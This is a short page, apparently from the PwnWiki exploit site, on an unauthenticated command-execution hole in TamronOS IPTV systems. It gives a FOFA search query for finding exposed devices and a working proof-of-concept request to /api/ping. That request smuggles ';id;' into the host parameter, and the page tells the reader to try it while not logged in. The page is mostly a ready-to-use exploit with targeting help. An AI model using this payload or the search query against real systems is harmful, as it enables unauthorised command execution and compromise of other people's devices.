TamronOS IPTV系统前台命令执行漏洞

From PwnWiki
This page is a translated version of the page TamronOS IPTV系統前台命令執行漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎

漏洞影响

TamronOS IPTV All

FOFA

title="TamronOS IPTV系统"

POC

 /api/ping?count=5&host=;id;&port=80&source=1.1.1.1&type=icmp

然后利用POC去前台(未登录状态)尝试进行命令执行

2iptv.png

Retrieved from "https://pwnwiki.com/index.php?title=TamronOS_IPTV系統前台命令執行漏洞/zh-cn&oldid=5087"